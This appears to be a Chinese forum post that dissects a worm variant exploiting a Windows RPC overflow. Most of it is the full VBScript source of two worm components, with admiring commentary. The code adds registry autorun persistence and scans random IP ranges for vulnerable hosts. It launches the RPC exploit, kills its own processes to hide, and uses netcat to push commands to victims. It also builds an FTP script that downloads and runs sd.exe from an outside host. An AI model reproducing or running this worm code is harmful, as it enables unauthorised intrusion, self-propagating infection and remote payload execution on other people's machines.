现在我给大家解剖这个变种的代码~!~~~!!
其实这个病毒是运用了vb脚本接合攻击程序,而攻击原理是调用了最新rpc溢出bug~~!再用rar将各种攻击程序和vb脚本打包成自解压,当这程序运行时自动解压出以上的文件并自动运行vb脚本"i.vbe",自动攻击对方~!以下是"i.vbe"的原代码的分析~~~!
set fs = createobject("/scrip"/&"/ting.fi"/&"/lesystemobject"/)
set wshshell = wscript.createobject("/wscript.shell"/)
set r = createobject("/wscript.shell"/)
r.regwrite "/hkey_current_user\software\microsoft\windows nt\currentversion\windows\load"/,fs.getspecialfolder(1) & "/\i.vbe"/,"/reg_sz"/
r.regwrite "/hkey_current_user\software\microsoft\windows nt\currentversion\windows\programs"/,"/com exe bat pif cmd vbe"/,"/reg_sz"/
*/以上两个语句是把"i.vbe"加入注册码,使开机自动运行~~!这个不用我多解析吧~!*/
wshshell.run "/cmd.exe /c sdd.exe"/,0
tp = "/iptemp.txt"/
on error resume next
while true
randomize
r=int((5*rnd)+1)
ip=r&"/.txt"/
set ipp = fs.opentextfile (ip,1)
do while ipp.atendofstream <> true
ip1 = ipp.readline
randomize //随机生成ip
ip2=int((254*rnd)+1)
ip3=int((254*rnd)+1)
tip=ip1 & ip2 & "/."/ & ip3
sip=ip1 & ip2 & "/."/
xp = "/"/
wshshell.run "/cmd.exe /c ping "/ & tip & "/ >iptemp.txt"/,0 //调用ping命令来检查这个随机生成ip是否存在//
wscript.sleep 5000
set pi = fs.opentextfile (tp,1)
xp = pi.readline
do while mid(xp,7,4) <> "/from"/ and pi.atendofstream <> true
if mid(xp,7,4) <> "/from"/ then
xp = pi.readline
end if
loop
if mid(xp,7,4) = "/from"/ then
fs.deletefile("/log.txt"/)
fs.deletefile("/ok.txt"/)
if tip <> "/"/ then
wshshell.run "/cmd.exe /c scan.exe "/ & sip & "/1-"/ & sip & "/255 >log.txt"/,0 //调用scan命令来检查机器的是否有rpc漏洞~~!//
wscript.sleep 120000 //延时120000给这个程序有足够的时间运行
strcomputer = "/."/
set objwmiservice = getobject("/winmgmts:"/ _
& "/{impersonationlevel=impersonate}!\\"/ & strcomputer & "/\root\cimv2"/)
set colprocesslist = objwmiservice.execquery _
("/select * from win32_process where name = 'scan.exe'"/)
for each objprocess in colprocesslist
objprocess.terminate() //枚举scan进程并关闭防止别人发现,他真狡猾啊~~!
wscript.sleep 60
next
wshshell.run "/cmd.exe /c rpc.vbe"/,0 //如果scan扫描到有rpc的bug,就运行rpc.vbe再由它调用rpc.exe进行攻击
end if
for x = 1 to 60
wscript.sleep 60000
if (fs.fileexists("/ok.txt"/))then x=60
next
set objwmiservice = getobject("/winmgmts:"/ _
& "/{impersonationlevel=impersonate}!\\"/ & strcomputer & "/\root\cimv2"/)
set colprocesslist = objwmiservice.execquery _
("/select * from win32_process where name = 'rpc.exe'"/)
for each objprocess in colprocesslist
objprocess.terminate() //关闭进程
wscript.sleep 60
next
end if
loop
strcomputer = "/."/
set objwmiservice = getobject("/winmgmts:"/ _
& "/{impersonationlevel=impersonate}!\\"/ & strcomputer & "/\root\cimv2"/)
set colprocesslist = objwmiservice.execquery _
("/select * from win32_process where name = 'cmd.exe'"/)
for each objprocess in colprocesslist
objprocess.terminate()
wscript.sleep 60
next
wend
----------------------
接上,当 i.vbe主程序把主权交给rpc.vbe这个攻击程序执行如下的代码:
set fs = createobject ("/scri"/&"/ptin"/&"/g.fil"/&"/esyste"/&"/mobject"/)
set wshshell = wscript.createobject("/wscript.shell"/)
on error resume next
wshshell.run "/cmd.exe /c rpc.exe sd.exe"/,0
l = "/---------- log."/
fi = "/logg.txt"/
fj = "/local.txt"/
set j = fs.opentextfile (fj,1)
lo = j.readline
wshshell.run "/cmd.exe /c find log.txt "/& chr(34) & "/["/ & "/vuln]"/ & chr(34) & "/ >logg.txt"/,0
wscript.sleep 4000
set f = fs.opentextfile (fi,1)
p1 = f.readline
p1 = f.readline
do while f.atendofstream <> true
if left(p1, 15) <> l or "/"/ then
p1 = f.readline
set b = fs.createtextfile("/cmd.txt"/,true)
b.writeline("/echo "/ & left(p1, 15) & "/ >%systemroot%\system32\local.txt"/)
b.writeline("/echo open hftp.3322.org 323>>%temp%\ftp.txt"/)
b.writeline("/echo sys>>%temp%\ftp.txt"/)
b.writeline("/echo dragoon>>%temp%\ftp.txt"/)
b.writeline("/echo bin>>%temp%\ftp.txt"/)
b.writeline("/echo lcd %temp%>>%temp%\ftp.txt"/) //当用户中了它的脚本后(如浏览网页时),若没有它所用的攻击程序,就到"htfp.3322.org:323"下载它所需要的程序执行
b.writeline("/echo get sd.exe>>%temp%\ftp.txt"/)
b.writeline("/echo bye>>%temp%\ftp.txt"/) //利用ftp的参数"-s"可以隐藏下载文件啊!!!
b.writeline("/ftp -s:%temp%\ftp.txt"/) //这就是传说中的反弹木马的技术啊!!!情天那位人兄曾在黑白网上发表过有关ftp盗窃对方的资料的文章
b.writeline("/del %temp%\ftp.txt"/) //,如果用户有装firewall大多都不得可以拦截
b.writeline("/%temp%\sd.exe"/)
b.writeline("/"/)
b.writeline("/"/)
b.writeline("/"/)
b.close
wscript.sleep 4000
wshshell.run "/cmd.exe /c n.exe -vv -l -p 8130 <cmd.txt"/,0 //在系统中调用n.exe来监听本地port 8130这可能是它做的后门吧,哈哈...其实n.exe就是nc.exe啊!!!!
wscript.sleep 1000
if (fs.fileexists("/local.txt"/)) then
for t = 0 to 1
wshshell.run "/cmd.exe /c rpc.exe -d "/ & left(p1, 15) & "/ -t "/& t & "/ -h "/ & lo & "/ -p 8130"/,0
wscript.sleep 4000
next
wscript.sleep 25000
else
for t = 0 to 1
wshshell.run "/cmd.exe /c rpc.exe -d "/ & left(p1, 15) & "/ -t "/& t & "/ -l 8848"/,0
wscript.sleep 4000
wshshell.run "/cmd.exe /c type cmd.txt|n.exe "/ & left(p1, 15) & "/ 8848"/,0
wscript.sleep 25000
next
end if
strcomputer = "/."/
set objwmiservice = getobject("/winmgmts:"/ _
& "/{impersonationlevel=impersonate}!\\"/ & strcomputer & "/\root\cimv2"/)
set colprocesslist = objwmiservice.execquery _
("/select * from win32_process where name = 'rpc.exe'"/)
for each objprocess in colprocesslist
objprocess.terminate()
wscript.sleep 60
next
set objwmiservice = getobject("/winmgmts:"/ _
& "/{impersonationlevel=impersonate}!\\"/ & strcomputer & "/\root\cimv2"/)
set colprocesslist = objwmiservice.execquery _
("/select * from win32_process where name = 'n.exe'"/)
for each objprocess in colprocesslist
objprocess.terminate()
wscript.sleep 60
next
end if
loop
set a = fs.createtextfile("/ok.txt"/, true)
a.writeline("/ok"/)
a.close
